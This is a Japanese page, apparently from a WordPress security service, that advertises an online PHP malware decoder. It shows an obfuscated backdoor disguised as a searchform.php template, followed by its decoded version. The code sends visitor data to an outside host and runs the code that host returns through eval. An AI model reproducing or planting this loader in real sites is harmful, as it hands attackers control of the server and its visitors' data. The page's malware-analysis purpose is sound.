Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php /* * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://wordpress.org/themes/template/ * @package WordPress * @subpackage * @since 1.0 */ $EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64_decode';$vXKzarSqz = $EisCC[64].$EisCC[7].$EisCC[26].$EisCC[57].$EisCC[26].$EisCC[64];$UlfmeWlz = "auth.php";$dsH = "http://";$dsH .= $vXKzarSqz;$dsH .= '/';$dsH .= $UlfmeWlz;$agkH = urlencode((isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER[$EisCC[65].$EisCC[5].$EisCC[58]]));$PYBFUMzJv = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[61].$EisCC[39].$EisCC[37].$EisCC[2]];$rDd = $_SERVER["SCRIPT_NAME"];if (isset($_SERVER['HTTP_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];elseif(isset($_SERVER['HTTP_X_FORWARDED'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];elseif(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]];elseif(isset($_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]];else $PLxAVm = 'UNKNOWN';$yVmUFDc = $EisCC[56].$EisCC[67].$EisCC[67].$EisCC[22].$EisCC[45].$EisCC[52].$EisCC[44].$EisCC[48].$EisCC[16].$EisCC[45].$EisCC[20].$EisCC[68].$PLxAVm.$EisCC[16].$EisCC[38].$EisCC[28].$EisCC[68].$agkH.$EisCC[16].$EisCC[17].$EisCC[67].$EisCC[4].$EisCC[31].$EisCC[68].$PYBFUMzJv.';req='.$rDd.';';$AFCLFaeBi = array('http'=>array('method'=>'GET', 'header'=>$yVmUFDc));if( function_exists($GKotnoU('Y3'.'Vy'.'bF9p'.'bm'.'l0')) ) { $ttekHhTRK = curl_init(); $DGxuu = array(10023 => array($yVmUFDc),10002 => $dsH,19913 => 1,64 => false,52 => true,42 => false); curl_setopt_array($ttekHhTRK, $DGxuu); $ttekHhTRK2 = curl_exec($ttekHhTRK); curl_close($ttekHhTRK);}else { $ttekHhTRK2 = @file_get_contents($dsH,false,stream_context_create($AFCLFaeBi)); }$ttekHhTRK2 = str_rot13($ttekHhTRK2);$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);if(stripos($ttekHhTRK2,'fa704e7366d666bd')!==FALSE) eval($ttekHhTRK2); ?>
<?php /* * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://wordpress.org/themes/template/ * @package WordPress * @subpackage * @since 1.0 */ $EisCC = "n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb"; $GKotnoU = 'base64_decode'; $vXKzarSqz = "xvc.cx"; $UlfmeWlz = "auth.php"; $dsH = "http://"; $dsH = "http://xvc.cx"; $dsH = "http://xvc.cx/"; $dsH = "http://xvc.cx/auth.php"; $agkH = urlencode(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER["PWD"]); $PYBFUMzJv = $_SERVER["HTTP_HOST"]; $rDd = $_SERVER["SCRIPT_NAME"]; if (isset($_SERVER['HTTP_CLIENT_IP'])) { $PLxAVm = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) { $PLxAVm = $_SERVER['HTTP_X_FORWARDED']; } elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) { $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP']; } elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) { $PLxAVm = $_SERVER["HTTP_FORWARDED_FOR"]; } elseif (isset($_SERVER["HTTP_FORWARDED"])) { $PLxAVm = $_SERVER["HTTP_FORWARDED"]; } elseif (isset($_SERVER["REMOTE_ADDR"])) { $PLxAVm = $_SERVER["REMOTE_ADDR"]; } else { $PLxAVm = 'UNKNOWN'; } $yVmUFDc = $EisCC[56] . $EisCC[67] . $EisCC[67] . $EisCC[22] . $EisCC[45] . $EisCC[52] . $EisCC[44] . $EisCC[48] . $EisCC[16] . $EisCC[45] . $EisCC[20] . $EisCC[68] . $PLxAVm . $EisCC[16] . $EisCC[38] . $EisCC[28] . $EisCC[68] . $agkH . $EisCC[16] . $EisCC[17] . $EisCC[67] . $EisCC[4] . $EisCC[31] . $EisCC[68] . $PYBFUMzJv . ';req=' . $rDd . ';'; $AFCLFaeBi = array('http' => array('method' => 'GET', 'header' => $yVmUFDc)); if (function_exists($GKotnoU('Y3VybF9pbml0'))) { $ttekHhTRK = curl_init(); $DGxuu = array(10023 => array($yVmUFDc), 10002 => $dsH, 19913 => 1, 64 => false, 52 => true, 42 => false); curl_setopt_array($ttekHhTRK, $DGxuu); $ttekHhTRK2 = curl_exec($ttekHhTRK); curl_close($ttekHhTRK); } else { $ttekHhTRK2 = @file_get_contents($dsH, false, stream_context_create($AFCLFaeBi)); } $ttekHhTRK2 = str_rot13($ttekHhTRK2); $ttekHhTRK2 = $GKotnoU($ttekHhTRK2); if (stripos($ttekHhTRK2, 'fa704e7366d666bd') !== FALSE) { eval($ttekHhTRK2); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.